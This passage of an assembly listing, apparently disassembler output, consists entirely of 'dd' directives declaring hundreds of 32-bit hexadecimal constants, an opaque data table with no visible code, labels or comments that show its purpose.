		dd 0B79161DEh, 0C56EC7C0h, 11BF2A72h, 0E9DB58CBh, 8477C7E6h
		dd 7F67AFE8h, 0C0D07791h, 0F6B01A33h, 0A3E62655h, 0EEABFC1Eh
		dd 2534A438h, 9226B042h, 6FEE24CBh, 5E7EDF62h, 597F9346h
		dd 30255BEh, 0E8739BFAh, 0C1E55109h, 0B774541Fh, 766EB259h
		dd 0A5AD1D9Dh, 4C88C2ABh, 264A2D1Ah, 2AF67BC4h,	7E7B97F5h
		dd 0A8718C86h, 7A9941AFh, 8602243Eh, 2E18A509h,	503C885Ah
		dd 1974BD4Dh, 791F895h,	7C1B949Eh, 365A27D0h, 0D975FC70h
		dd 53AEBEAEh, 953BEA3Bh, 95C304F3h, 87FA460Ah, 3D81B0BAh
		dd 6EDD5158h, 0DD08F04Ch, 0E8BD95E4h, 7C36E2AEh, 26754721h
		dd 2896B7ECh, 97C14129h, 306A21BBh, 83E7CEAAh, 0E1C5777Fh
		dd 0BE658494h, 3568703Eh, 0B5EB9611h, 0D5024946h, 9C3535F9h
		dd 3AE95951h, 0BDF0B0F2h, 7BE07A4Ch, 0D68E3620h, 75352F85h
		dd 18D061F9h, 713F8680h, 123F6387h, 4713BD02h, 0D3AF81FBh
		dd 237F27EBh, 334DD323h, 57C8E128h, 4BA21C9Eh, 14EE99BAh
		dd 0A26C9F91h, 0D4EE1D80h, 0E942573Fh, 1E33F581h, 4897A177h
		dd 0AB6FAF86h, 2223F33Eh, 0E391CD9Fh, 0FD304E2Fh, 9765FF6Ch
		dd 5E6130C2h, 5F34199Dh, 83685299h, 2569FFDEh, 0D7CC80AAh
		dd 0A90A457Dh, 0BB28623Ah, 0BAA0687Bh, 10B413FAh, 0AF3E8231h
		dd 0E5777175h, 579792DDh, 0AB45C7E6h, 3007CA78h, 6F8D8BDEh
		dd 561437FCh, 5A8B16A9h, 5C3B5F69h, 439D2908h, 503E9342h
		dd 0D9F9EBCDh, 7CD285FDh, 0A3BFCDADh, 4F5B513Dh, 0D19C632Ah
		dd 2A2B864Ah, 3EE5F859h, 0C0B7FC98h, 0EEA617F4h, 15132E8Eh
		dd 0F1C8F12Dh, 7AA3C4AAh, 0CE859C4Ah, 1457B075h, 0AAD2945Fh
		dd 0C494C3D8h, 0AFA969Ah, 0C3272D9Ch, 844611BFh, 0E93F48BAh
		dd 0CAA3E637h, 0AEE9BD7Fh, 8045EA57h, 541C8B01h, 0A34CFA4Ch
		dd 0F0329A2Ah, 8E6D6E6Ah, 57250A1Ch, 0A87E9C64h, 0A7D0D903h
		dd 76191260h, 2CD6C5C1h, 9CB4575Ah, 703F8832h, 522D864Fh
		dd 0D99D597Fh, 0F8F57D02h, 9B3492D1h, 0FB9E9A55h, 0B625C3EDh
		dd 3A84AFB3h, 0BDD786A6h, 70AB50E4h, 3521C0DDh,	1B5DEBA6h
		dd 0C1B399EEh, 0F0C5F839h, 0BEB0698Ch, 5896B30Ch, 0DBEF2534h
		dd 41CA6D9Ah, 0A1FA9176h, 0F86EB987h, 0C5FEB53Bh, 4EB535BAh
		dd 88FD638h, 0FC9386FAh, 209A6154h, 64693AB3h, 0AFB4ED22h
		dd 408BECC7h, 9F9055BEh, 0FAC4F85Ch, 0F981C8A2h, 0B11EF455h
		dd 0D1617D4Bh, 4DF025EBh, 5B26CBE0h, 0DD5378DCh, 8D7FFA52h
		dd 0FCF0DF4Ch, 0BD1B2D85h, 1D8DE335h, 0AAA970Bh, 0DEAB82D1h
		dd 0E97B1A7Bh, 648AB484h, 68A80AC9h, 1E76551Bh,	5892B0B3h
		dd 8C8B9011h, 968BEA85h, 0BBAC6A33h, 0FC4A4E1h,	42836FB5h
		dd 932A4495h, 0C3454728h, 84F73FBh, 0C0CBADF8h,	19EC6BAAh
		dd 10C15979h, 72C1C51Bh, 0FA980094h, 62ED87DCh,	7968197Eh
		dd 0A50738B4h, 3F8A3421h, 29FCF765h, 0ADE734C1h, 5FDE6DEFh
		dd 8C3CD763h, 0ABA5CAD6h, 28572FAAh, 0E6B1CABAh, 45D28E4h
		dd 46C356DEh, 1A9A6649h, 3A1CF794h, 2423CAA5h, 0BA25AC57h
		dd 2BA94F9Fh, 909512B9h, 0FE88B69Ah, 0E09D0EEBh, 63F9ECDCh
		dd 0A8C0C59Bh, 385851C0h, 0E7CBF0F2h, 3C9C7791h, 4F6F7754h
		dd 0FE932DE6h, 0F6ADF279h, 4C4F034Bh, 0C2412DD7h, 99D1D97Bh
		dd 0E6EFE875h, 0A1D97F14h, 0B645B99Bh, 7D9FE352h, 13B5FF56h
		dd 906B9B16h, 4513B8F8h, 5638724Eh, 0F428F521h,	7F08D535h
		dd 0D9E91043h, 0EA467E03h, 76D4EC95h, 1FF54EDFh, 5FD1F5D5h
		dd 0C66C9206h, 0DAF0E9F7h, 0A76BD331h, 0D2534635h, 0ABFAC7AAh
		dd 35F430ACh, 0D9DC83EBh, 0CD2FC876h, 0BBF11196h, 0E7C0CABh
		dd 0FBECD7F1h, 8CB9054Bh, 9B86E10Ch, 0D398BA49h, 0F0CE607Bh
		dd 99B055BFh, 0FDCF7141h, 7B26A1E1h, 37702CECh,	0AE2D48FCh
		dd 0AAA8697Fh, 97CD1B9Fh, 5B851D00h, 2AAAB27Fh,	4015D6B9h
		dd 0F762991h, 16012D52h, 0D37A951Fh, 0D70A5E7Fh, 35E56E07h
		dd 8E35EC5Bh, 0A3E6FF7Bh, 4438863Ch, 9E378228h,	0C64FBAD6h
		dd 95AE3DAEh, 2D05A768h, 79FE62AEh, 0BA9EC53Bh,	8611CC99h
		dd 0D492E501h, 0E1B4778Eh, 1E6DEA1h, 6CC792C7h,	0C5FE07D5h
		dd 0BC33F3E6h, 757052FEh, 726E4703h, 2919A967h,	640BB37Ah
		dd 5F5FD473h, 7DE25B6Eh, 7821FF5Eh, 1E54ADE4h, 0A742128Dh
		dd 160AEA64h, 7C367C1h,	505E88A6h, 7DCB8293h, 0FD573AD9h
		dd 8BF19DF2h, 6864EC5Ah, 5DDEF0B0h, 4B16A206h, 0D8F27250h
		dd 86302E0Bh, 0A490BA9Fh, 7CD9AADDh, 0A83A7420h, 5E3B9BFDh
		dd 771EB7F5h, 0CDF15217h, 0F250B84Ah, 0AB1087E1h, 769E255Eh
		dd 5B917CCFh, 615FDDh, 5BF0F4B1h, 0B6DF7F22h, 880BA2C1h
		dd 9AAF6CCBh, 8D5A9323h, 3F851C13h, 2EB6C04Eh, 0EFDCFEDAh
		dd 328C425Ch, 0BF0BA872h, 0E4AB99BFh, 0C8160C6Fh, 527CF765h
		dd 0B8E245E7h, 0EA7623CEh, 0CC0A95E6h, 51F6614Eh, 7707B5DFh
		dd 0C0F29EBAh, 8DDD9309h, 44B21F8h, 6559F5C7h, 0A371CF90h
		dd 0BF2B279Ch, 0D00063B8h, 2AEBFB61h, 0E26B69B5h, 2AAC4187h
		dd 0A2E83262h, 0DBDE6736h, 794D1A1Dh, 5C96C234h, 0BF73E6A7h
		dd 0E092CF0Ch, 0AA0F3BCAh, 0B98F87BCh, 545F394Dh, 0CD326E32h
		dd 1E8C94E1h, 0CC5CC8F1h, 0B7F37AC5h, 2410919Ah, 13E7198Ch
		dd 2AF628FEh, 0E2F7C721h, 5EA7891Ch, 78F9976Eh,	6B85558Eh
		dd 86DBBE5Ch, 0D9C5B0FDh, 66AC62E2h, 582EF9F6h,	3386B49Bh
		dd 0CDC1FBF5h, 3858BBD7h, 6DB3BFC6h, 95EB66EBh,	9BBBA43Ch
		dd 12C145B6h, 296DBDBEh
		dd 0F481ABC6h, 0B8F80EA3h, 0B377554h, 0D1CDF96Fh, 0F36E654Ah
		dd 5CABD154h, 6B2BED15h, 604B4E5Bh, 0D1A2ED2h, 0F4B6405Eh
		dd 0FA38F3BAh, 62501136h, 51AA49DBh, 440CC9C0h,	0BF21A56h
		dd 1BC2B640h, 0B259B43Eh, 9FB3D33Ch, 92B4AC41h,	591B1669h
		dd 0B11C5CE5h, 66100ACFh, 0A885C196h, 0FD1DE063h, 20A8EDC5h
		dd 773398BFh, 0B0261867h, 5AADBE6Bh, 0D99FD8EFh, 329AECD0h
		dd 87E03557h, 0D5F261E3h, 0EB6A6B5Dh, 5D489445h, 5AA7DDEFh
		dd 4250B654h, 0CC6E73B3h, 0FAC29AD9h, 0D3B43A32h, 68711961h
		dd 0F1CD0F7Bh, 0CEE79DAh, 67F65C2Ch, 835A9D3Ch,	0FDDAFD89h
		dd 0F12B23CAh, 0CAAAA427h, 2B2DE32Fh, 0EB9D5BA2h, 0B70B819Ch
		dd 0C0E1C23Ah, 0E66E3EE1h, 0AB0722F0h, 0B175319h, 9F87D8CDh
		dd 67F8D1E0h, 5AC0B2CCh, 84E7B3FEh, 290619A8h, 8B1F160Eh
		dd 0EB4B10E7h, 0DF1E79ECh, 17DAFCBCh, 0DB392F46h, 0A74AAD54h
		dd 0DA26BF99h, 0C64E590Eh, 910C79F8h, 14FEB61Bh, 506A094Bh
		dd 754B2361h, 18AC6FBEh, 0F0F21197h, 0F5D383EDh, 6CADE9DAh
		dd 0A47E7926h, 65A19459h, 4CC7A8D8h, 0A0FC5E33h, 0D42D66DCh
		dd 685878A1h, 8190D3A4h, 0A814D45Dh, 0B0F28BF9h, 0A05350A9h
		dd 0B9960E7Dh, 0BF56DEECh, 0AEA84245h, 83E24229h, 0BB14D70Fh
		dd 77EC73BFh, 0C69D933Ch, 900EB68Ch, 979E8033h,	69D13D3Bh
		dd 2A0BD6CEh, 5EB9714Ah, 47BE94C5h, 0FDFE39ABh,	0AD140B4Ah
		dd 5909B9FAh, 324C4F2Bh, 0B118ECE0h, 71DF5AE1h,	90C2617Eh
		dd 527BD628h, 54BB6C8Ah, 86C9ADADh, 0ACAC4456h,	9551AB4Ch
		dd 554B49Bh, 0CFDD3F6Bh, 0E2490B39h, 7EC6E168h,	2B76F90Bh
		dd 0C7151BC9h, 6E54F568h, 0F3C91E3h, 73A5E761h,	6565A373h
		dd 17FB248h, 0AE51FF4Ah, 0C5C57C9Bh, 4D35E086h,	0C5A16D15h
		dd 4F156B62h, 0EC6A471h, 81098592h, 0A913A99Dh,	30EADC07h
		dd 0A68E1D6h, 2A385535h, 7295C522h, 1AF5D2FEh, 0F83BD944h
		dd 80AD7C61h, 0E3791A9Fh, 2E3553DFh, 13B3F3D8h,	5459E9F1h
		dd 0A13675DFh, 0DF6579DBh, 24AC4A81h, 0AD6D9F69h, 3AE42E0h
		dd 0FDF65F7Eh, 0BB3B2A89h, 850F4DDBh, 0CEC28B73h, 0ADAE9120h
		dd 1ACFD43Eh, 0F2667141h, 8A7BBBCEh, 695716A1h,	0AB7CAA22h
		dd 51685F89h, 79D0B7AAh, 0A1688870h, 126B2174h,	0E875C3Dh
		dd 0FB157D0Ch, 0FF48F44Fh, 0FA65ACC8h, 81F937D6h, 4517EE17h
		dd 962EDCF0h, 0FC654996h, 12532AC8h, 0E5E1CAB2h, 5AEDE76Eh
		dd 0C08936B1h, 40F1114Ch, 47511291h, 0ED33B059h, 1DAA5865h
		dd 2C61EC92h, 6F233959h, 4CB6D2F9h, 8D81F6C1h, 0DADE6A52h
		dd 0D453CAEDh, 0F13217A5h, 75C52D95h, 0E04DB132h, 0D075B882h
		dd 0B74E5EF7h, 1A7C51BDh, 13FC6565h, 0F1A3C491h, 34E5F04Fh
		dd 0F767B95Ch, 0DF254B10h, 2F96634Fh, 354D8FCAh, 957A9D68h
		dd 0BE2098E0h, 42B64963h, 91AF3CB1h, 279A9106h,	1668ECEBh
		dd 46A343C3h, 2C2D4EFBh, 0F8E3738Bh, 2AF863BEh,	5915CF74h
		dd 0CAC92F5Bh, 0A93BB72Eh, 0CC97FAA5h, 951AA772h, 0ED75CBC6h
		dd 88DFB3BAh, 0F09FE254h, 0D94EEB03h, 566EC62Bh, 1AD10F15h
		dd 0ACF14937h, 0C6045FB8h, 4DE42634h, 0FCC8BC53h, 75EACE17h
		dd 0E56BA771h, 6C8B36CFh, 0DAF5EAE3h, 0B3AFB270h, 1B534C35h
		dd 5171D34Dh, 409FB7ACh, 90CA9893h, 0B175B463h,	4CA49A64h
		dd 9C8539E1h, 8D744D74h, 896AD4D5h, 1C95B87Fh, 6E40BD4Dh
		dd 5A4A2965h, 0B2AEE9F9h, 0FB43998Eh, 0EA9C2A57h, 8E17633Fh
		dd 0E8EE5525h, 0B4615EAh, 0DDB1C895h, 0DB218FD3h, 16113CB0h
		dd 8BCEEBB3h, 48B9823Ch, 11FDB689h, 86F56CE9h, 1CB8E215h
		dd 0CF5AEE34h, 3A748F17h, 80E02250h, 2F405141h,	0D4ABF3E2h
		dd 569ED28Ch, 4E4599AAh, 58B075EAh, 0C58A98B6h,	9A40CA84h
		dd 766FF2D1h, 3E44AE83h, 69DB4CB1h, 0A967F3D3h,	0D4F8C405h
		dd 39CD2D36h, 0B00F7E37h, 75162CDh, 0EB515F6h, 43F58B70h
		dd 6ADF3915h, 0F0DFB71Ah, 8A270348h, 5625980Eh,	607951A5h
		dd 0BCC74AC4h, 85A55D1Fh, 608A765Fh, 55C1BC73h,	3D5577CDh
		dd 0AA5F0A57h, 0F552CB1Ch, 99371FF2h, 0FBF2D1F0h, 7EB3686h
		dd 64D53F76h, 0C464129Ch, 0CC64C83Ch, 0A4C5A4Bh, 231A9950h
		dd 1A5A86E3h, 57C657C8h, 0B1CC274Fh, 8549D127h,	2CF2224Ah
		dd 420D4625h, 69A27049h, 0F24B142Fh, 7E707C4Bh,	0CE7DE460h
		dd 751B30FAh, 68E4A454h, 0FE165360h, 2173D2F2h,	0D77DC77Eh
		dd 0ECE3FD3Ah, 2CF0FACAh, 74A04AAh, 9C1B1A6Ch, 9D5B2C21h
		dd 3B8E2E3Fh, 88D12FE1h, 68B5F1AAh, 164A34D0h, 1D40AC1Dh
		dd 0CFBFE43Fh, 37C2749Ch, 0BFA8430Fh, 3245F61Bh, 26854AC7h
		dd 0EF5D7A16h, 76708C93h, 7555F9A8h, 7CC0CC54h,	0F899AD04h
		dd 50E51336h, 7D4B42Eh,	9F8DF09Fh, 0E57CFFA6h, 0D5A94FE7h
		dd 0EC1F4A6Fh, 52DB2E43h, 9556B71Eh, 54A6CD1Fh,	0F12D5DA2h
		dd 0BAA4731Ch, 0CB5FE410h, 0D0411A97h, 46E94690h, 520CC6B2h
		dd 0D8DC45FEh, 3DDD9E9Fh, 303D9D37h, 8D53B46Fh,	8ED4CE0Ch
		dd 59A33A27h, 1E1FC07Bh, 0F22795B1h, 837C82A9h,	58B82095h
		dd 0C2EAE7A7h, 78D452BEh, 0B5F34149h, 14C4AF87h, 26CA9AABh
		dd 5CB146DDh, 2F9A17E0h, 629E566h, 271A5703h, 0A185DD87h
		dd 6D25C869h, 57788D8Bh, 50DD0AC3h, 373629E7h, 87DA68C2h
		dd 0BA3DB8F4h, 8FA62F7Ah, 24366C4Ah, 0ED4A87E3h, 7B3017F0h
		dd 682C88B2h, 50FC5EDEh, 28C8E5A9h, 59D94F7Eh, 45C38E29h
		dd 1E6F08D8h, 7A266158h, 0A2C97E93h, 93829733h,	0E6109915h
		dd 42F6DC5Fh, 7DC29948h, 0C0E06E97h, 0D2F1EB50h, 0C343481Dh
		dd 469E4FEFh, 185CC1E0h, 284E1BECh, 15C119F6h, 4A7B27EFh
		dd 0C33E544h, 64EA5760h, 0CA999764h, 72ECE649h,	9312252Eh
		dd 0DCE09751h, 1BFD9BBBh, 4E2DD62Dh, 61FE9D7Fh,	0A0E48AEDh
		dd 8703776Bh, 675E96Bh,	0D132168Bh, 7963A37Bh, 215CA666h
		dd 813340A5h, 546D4B2Eh, 0D19A5D67h, 0F54E2A81h, 1AD6A2E5h
		dd 862E1213h, 0B9856F0Ch, 5968BAC7h, 9652C8FFh,	43C7AB1Ch
		dd 72D5B0FBh, 715CCB41h, 7EF2673h, 503C3CCEh, 741F7EB4h
		dd 5E3EAA18h, 0BDF50FF1h, 91EDD1FDh, 32F38627h,	95695525h
		dd 70008A90h, 0BF2624C0h, 66AAF312h, 0F69E86F3h, 0DE6476A8h
		dd 7819FC5h, 4ED850DCh,	0C9621CAEh, 0AF2E21Fh, 4BD872Bh
		dd 1025E833h, 0F4D56C44h, 53EE5722h, 0B4425BDFh, 2ECB8918h
		dd 7823EBBFh, 8C7AB2F4h, 0C6B2FE72h, 16A1B39h, 2A25F6C8h
		dd 0B0E83FEh, 0F683FF5Dh, 0ACC09728h, 0D1DF611Dh, 0DF58CE33h
		dd 0B586D5E0h, 0DDBAF82Dh, 58F22FECh, 0CC5D0F70h, 0F50A2CFDh
		dd 5C14692Ah, 2F8863C0h, 8FB458E4h, 1BAEB8DDh, 0A38CCC95h
		dd 37FA288Dh, 6C9EBE4Fh, 6BCB3112h, 72AEAAF2h, 333EAD5Bh
		dd 1890598Ah, 0CC7618C6h, 0B486F69Dh, 0F8952BDh, 5176A51Ah
		dd 9E1477F1h, 0BA7297EFh, 64CB5BACh, 0E8E9C4F3h, 6EA8E266h
		dd 0B01234BEh, 8843D7DFh, 57F94490h, 5BB70A6Bh,	0BF71814Ch
		dd 0B8548C84h, 0DC56934Eh, 1BEB1B08h, 1168A20Fh, 89EB9436h
		dd 3E28F5ABh, 118E4D78h, 8C0FC43Fh, 90997E21h, 0B0A13AFBh
		dd 0C59ACB9Ah, 3336B507h, 9D2A04Fh, 9C8C8F56h, 0D6AB7F6Eh
		dd 0A6F4AC6Fh, 85DDC9B4h, 6EF54150h, 0CBF15A3Ah, 0B1125738h
		dd 0B2EC33EEh, 0E42762B3h, 9DE26338h, 4C302D0Bh, 2841CB3Eh
		dd 552368F2h, 0EC5B394Fh, 0DA6076F7h, 7CEB8B95h, 56B40969h
		dd 1685149h, 9ADE4B24h
		dd 205FBD9Dh, 0A946A50Ah, 3FDBDD12h, 8D78989Eh,	765D9B2Eh
		dd 0E25FC78Eh, 26DD47B7h, 5A2629CBh, 4C94B7C2h,	9B7B509Fh
		dd 9049DCE7h, 20300585h, 0C1AE46ADh, 72EFF1B0h,	461C80FAh
		dd 0CF70DC1Fh, 306BAFC2h, 87E302C5h, 95A477CDh,	3AF66F1Ch
		dd 3F18969Ch, 5D83F5Ah,	0B4AA3DBDh, 4DBADF25h, 27E39283h
		dd 113E9104h, 3CA5A804h, 6AF6B28Fh, 0E3F77F53h,	38228E65h
		dd 9D3B7C53h, 34D2F812h, 78561417h, 2E9FB66Eh, 1B328D0Fh
		dd 7FEC1F51h, 7D367BF8h, 4BF8BFC7h, 21D8D6FEh, 2A2B6D67h
		dd 0B9D7F595h, 2C0C1E1h, 7D01D80Fh, 0CF8BB9EAh,	0C161B3ADh
		dd 4A3AABE0h, 859F603Ch, 20F8B411h, 73A36169h, 0A9086B47h
		dd 87F3D3B5h, 1D58115Dh, 3CB9CA11h, 0A4445DD3h,	2CB82DB2h
		dd 8CE86D37h, 0CE5FB697h, 0F139F198h, 6B45C91Bh, 0EFB53D5h
		dd 1305E6ECh, 0E200BDBh, 6D8004A4h, 152193ABh, 0BA5D24D2h
		dd 222933CEh, 16BBC956h, 0FDFA1DEAh, 0F8F6EA8Dh, 27B57ADDh
		dd 9A4E0C78h, 976D3B45h, 47CAF444h, 79188B14h, 0DE25782Ch
		dd 0D2DD92F9h, 9EBA8AFDh, 0F1023156h, 0C7F47F11h, 863FA199h
		dd 7C30B46Eh, 2E8A1303h, 88D68F7Dh, 0BDE39D92h,	53B5AD15h
		dd 51335429h, 5A86B1C2h, 11AE3B3Fh, 0E251664Ah,	3F059CC4h
		dd 0C7052CB4h, 0CD811F55h, 34C03F6Fh, 0FCD9C06Ch, 5BC8F9ACh
		dd 0C2050E69h, 2A024ADFh, 7DE7731Ah, 0F6A1E034h, 7C25DD9Dh
		dd 0B2F67F10h, 0CFBB7FCEh, 0D0851AE7h, 0D8744944h, 0ED145B7h
		dd 0ABDBCFA6h, 0D4433157h, 0B4C2FBD7h, 0EA55F104h, 87FE7BC0h
		dd 0B96F35D0h, 549D362Ah, 128692A4h, 8685CA53h,	0C8A75B97h
		dd 0A3353B51h, 848A1943h, 405EE718h, 0E815AF8Ch, 370A252Bh
		dd 0B7B6A6FFh, 3042BC49h, 3C2550AAh, 0D1DB032h,	4EB6168Eh
		dd 0CDFA52DEh, 36055F03h, 533F4FADh, 614CB80Ah,	0C38DE0FBh
		dd 0C9DA8EB7h, 0F931E2BCh, 1D0A38A2h, 0CA758DD3h, 6EAD12ABh
		dd 0E74D689Ah, 0BAAFF5FFh, 2C9588D2h, 6F602169h, 0F7B3B1AEh
		dd 75A93FADh, 670C777Ch, 4597D2F3h, 0EB64DFDFh,	40D8532Bh
		dd 6066C18Ch, 0EAF2FA45h, 612B5506h, 51BCB20Dh,	536A5587h
		dd 7CD697FAh, 1A6992BBh, 0D3291C9Bh, 0F667E5AEh, 0F68AAD19h
		dd 13F3B02Fh, 6FDA7BAEh, 0AAB2DCA5h, 3C51D46Ah,	0AC38E813h
		dd 785D200h, 71F28E1Eh,	975B77C9h, 0F5E2AE65h, 0F4A71D58h
		dd 7C31DD44h, 26EA68DCh, 0AE439312h, 0BCFD3C88h, 0FCBE27CEh
		dd 253AADA2h, 630DB816h, 2DCF2959h, 3730551Ah, 0CF54964h
		dd 0E5A2D9D9h, 451B2B54h, 0DC42C24Ah, 0DBC3C1EAh, 0B3ABB49Bh
		dd 0BA6A1A45h, 0E5FB6ED0h, 0E1DEE75Bh, 4AB28497h, 600AF394h
		dd 0CA6EB9E3h, 972AF87Ah, 632DAD07h, 0D699F228h, 0A2EACBA5h
		dd 21C7781Fh, 0ADA34F9Fh, 72AC8163h, 4AD34D1Ah,	47AB20ECh
		dd 0F10F4A51h, 0DB7191E7h, 57BB4CA5h, 0EEE66F88h, 0CA87A379h
		dd 0DA93E3B4h, 3575C581h, 3225F451h, 35C15883h,	5A319A55h
		dd 0C312324Ch, 632F5286h, 74A30F99h, 57EA2A52h,	0E4D64F5Bh
		dd 0CC720581h, 9D07EB1Ah, 29BBAB4Dh, 75D3A7DAh,	5748DFDCh
		dd 0BF86F72Dh, 9D550F4Ch, 6B7129A7h, 0F1F10BF0h, 238AE856h
		dd 7B5351E6h, 0B83302DAh, 4A4A7B8h, 0B69D4806h,	9339156Eh
		dd 0D4D96380h, 5736EF8Bh, 0DDEA862Ch, 0E355B312h, 7C4A7A06h
		dd 0A368F553h, 5452CC06h, 0BEDFE16Fh, 7CCF1346h, 0FF016140h
		dd 3DEDAA52h, 0FCB2CC08h, 7465F250h, 387E8A9Dh,	147328D9h
		dd 0EB3134E3h, 7BD81DD4h, 33B234D2h, 59145664h,	62C92E53h
		dd 3DC1B2FFh, 7F173B2Bh, 0A7AF8E23h, 309250DAh,	77D9D15Dh
		dd 0CBC4DA26h, 6BCA6E81h, 0CC5C9DC2h, 3BB9D435h, 797BE8ABh
		dd 8E312911h, 0BED5E4A8h, 0BADDC9CEh, 0EDD7AD1Bh, 714E4E76h
		dd 1DAE149Ah, 0B714EBD9h, 5D2E7DCBh, 6DAB8D5Bh,	3C594B61h
		dd 5697DA2Eh, 0D59085C1h, 933238F6h, 0FF453218h, 0DC822542h
		dd 682B4EE2h, 32CF74Bh,	5BC52588h, 0D8240F87h, 4AFF91C0h
		dd 0E4A580B8h, 662E68B5h, 760A1745h, 0EDE01C5Fh, 425F1F87h
		dd 0B9455B53h, 0FED23ACBh, 60A5674Dh, 693F6C4Fh, 7E146DC4h
		dd 0E883BA15h, 0CE59CC52h, 8AADD935h, 5F953D55h, 6BE5C38Ch
		dd 0A699CCAh, 1E3D2E59h, 4B803CF8h, 9A1E0A11h, 0E78EB161h
		dd 0CCA9F320h, 0D8CBB288h, 7F56EE63h, 0C74FC737h, 512A490Dh
		dd 0F6D1112Ah, 0FD67686Eh, 4BDE57E1h, 0E8D7ADA1h, 97B4F1EFh
		dd 0FD4B2F53h, 9C5C5B86h, 0BB3F3F2h, 93C26AFBh,	0D92E4A69h
		dd 41762FB5h, 4CAE2BF4h, 3C8CEA25h, 0D6627853h,	0FA6C48B7h
		dd 8DFE3B11h, 30AA575Eh, 0D31BE26Ah, 4DA85057h,	0FFB9337Ch
		dd 0DCAB4751h, 0F8AC950h, 87559D0Ch, 0A262592Ah, 487E8B9Fh
		dd 6962663Ah, 0F07C2207h, 0B79ED4ACh, 49BBCE36h, 74605CC6h
		dd 0A6C8FBEEh, 0E889D9C5h, 0C4ADA72Eh, 0B2D97677h, 3EE4CAA6h
		dd 1F35C4AEh, 72A6A898h, 32FCDBCBh, 0FCE02E40h,	0EE52EB54h
		dd 0FC6F4130h, 0EFDA7ED0h, 16E64E1Ah, 76FD7257h, 3DFDE561h
		dd 0C1B1C930h, 0A5B54D57h, 515A87E1h, 0BD59E58Ch, 5D8E39BEh
		dd 15471AD0h, 917F98CFh, 0B33300A1h, 92FFE12Ah,	67AF3014h
		dd 0B85CE705h, 9593DE09h, 88130CD0h, 0BF9976FFh, 0D6557A24h
		dd 6EA07D35h, 6AC1F095h, 0E7BA1A90h, 15917DEh, 57E84B4Bh
		dd 0E9DB8C06h, 0F3BF2356h, 0AE2557B3h, 70788D6Ah, 0A71BBBEDh
		dd 0B6ABD195h, 5FB55168h, 92AACDB2h, 463EAC4Fh,	0F6179B59h
		dd 0E78052E6h, 7549C17Ch, 7D256593h, 0AD97B927h, 0A03F7249h
		dd 0BF9FF140h, 0C6E62E8Dh, 6CD50D05h, 5729AA6Ch, 567651B7h
		dd 0C1D1B0B6h, 685ED475h, 0AF3F255Fh, 0B7075F8Dh, 0C094D35Ah
		dd 37F48717h, 45EE877Eh, 6D903770h, 0F77EC7D1h,	0F76F349h
		dd 4275C680h, 0F5217BBDh, 3D02A7AAh, 63C46FB9h,	8B456B0Ah
		dd 0BC73E751h, 34DBAB6Eh, 0E70FD69Dh, 1874084h,	8C79DF84h
		dd 3266DA31h, 9DA210B7h, 421DA18Ah, 0C095107Dh,	0B72A0C97h
		dd 6F97C35Ch, 0CC747E76h, 20960FC2h, 0CAA74EF5h, 3C796633h
		dd 6391B50Ch, 7EA8F5AEh, 936899FCh, 6AF4D33h, 0D98425EAh
		dd 9F7E4CD9h, 0C57DBC7Dh, 2575C349h, 0E3695B6h,	6D085474h
		dd 0EF90648Eh, 2427A766h, 7521030Bh, 0E087A96Fh, 16739667h
		dd 0ADD6E0FDh, 96441EA9h, 5EC7577Eh, 6AF2FBCEh,	0C33D0393h
		dd 0CBF5DFD8h, 362B501Eh, 4F91D95Ah, 0A885D0C8h, 0F7DF1C33h
		dd 9AC40997h, 0B106296Ch, 8E071DFDh, 0F63253BCh, 4B03E5F5h
		dd 49692B4Eh, 0FD3AD2F5h, 0D59539C2h, 0BFFE6CB0h, 3A728A93h
		dd 0F83F24CBh, 0D94CB1CEh, 21A6E390h, 0FA6FDCDBh, 0F26DDF2h
		dd 539091ACh, 0CCB7C66Bh, 11C581BDh, 0F06FA7C5h, 1DB16B8Bh
		dd 6EFAD55Eh, 0B4F1F005h, 2D70BA1Ch, 8CBF78EBh,	0C3B0986Dh
		dd 0B7262A29h, 3C815598h, 73163A1Ah, 0DC695C73h, 40ADC71Dh
		dd 0E7DA1CA8h, 2E481109h, 7B215EB1h, 0CEAFF077h, 32B37FC4h
		dd 911B936Ah, 6DDE2993h, 0EC741B3Dh, 551B8BB3h,	9E13650Ch
		dd 6531AD5Eh, 0E371DD5Ah, 81FB541Bh, 28B4D919h,	7D0AD911h
		dd 0C6A81EC7h, 0AA0956EFh, 3AB0DC26h, 9D4EF2AEh, 53C3B35Bh
		dd 0E6A10E9Fh, 0E5C413D9h, 0B3EAC1DDh, 45F26EAEh, 97369A0Ah
		dd 0DD5BC2BBh, 414862DBh, 78D08DF7h, 6DEC337Dh,	2C6189BCh
		dd 0D50D98B8h, 2D05A1E9h, 7F661208h, 9243F8C5h,	6BB954FAh
		dd 1B5C18B4h, 1696F26Fh, 0D391A8AFh, 4E9DB27Eh,	8E1B2077h
		dd 92D72ADCh, 25584807h
		dd 4DFAEC9Fh, 6CDD5B72h, 895DA43Bh, 284DC894h, 76BDF83Eh
		dd 0CE446ED1h, 0A57258EDh, 0A8F2550Dh, 326F99A8h, 7F1FC593h
		dd 0E7953159h, 0A7F2CBC7h, 6368FE54h, 64BC40D6h, 0C28F6BC5h
		dd 44838602h, 0B3109ACDh, 6A295686h, 0A99FEF69h, 247D540Eh
		dd 8B24231Ch, 0FC66072h, 0E55D467Bh, 4658C9DFh,	0C52A251Eh
		dd 0EB9C9B0Eh, 1378537Eh, 0FC7EE84Bh, 0BD09F411h, 2B1664CAh
		dd 0E3739A08h, 7FEB43E2h, 3DED3378h, 667F2B27h,	0B1CBAF0h
		dd 52FF51BFh, 0BF52495Eh, 0C35F4774h, 0CC59D129h, 0C4A4EE2Bh
		dd 85D6399Dh, 9954C0E3h, 0BA743FB0h, 8DB1ABAAh,	0F15A6D48h
		dd 7879278h, 34A3CDF7h,	0F58E1F65h, 1A991941h, 0D17B0AC3h
		dd 0D510AB81h, 0AB98A628h, 0FA14791Ah, 3678CB45h, 0F1AC3FF3h
		dd 492DD230h, 0B4358A3Dh, 0C6E19DBCh, 0E581CA70h, 0BA5EDD62h
		dd 5FA33255h, 625F3BD9h, 82466489h, 62AC5A4Ah, 99951578h
		dd 0D844C046h, 7707BD5Dh, 0F230B796h, 0D85A9A55h, 85A6A8D0h
		dd 747C8FCDh, 0C9FC31AEh, 6D166F40h, 0BA468F54h, 4977EFDCh
		dd 2589F010h, 923D5DF3h, 670B41C0h, 5A5C86DCh, 217CFA6Ch
		dd 0FBB2F570h, 0DB5E989Ah, 3FB06890h, 0F48E0551h, 2DBCBDC1h
		dd 86A2BF53h, 7A69AD8Ch, 454AFE2Ch, 8F6A4344h, 0BD9DA2A3h
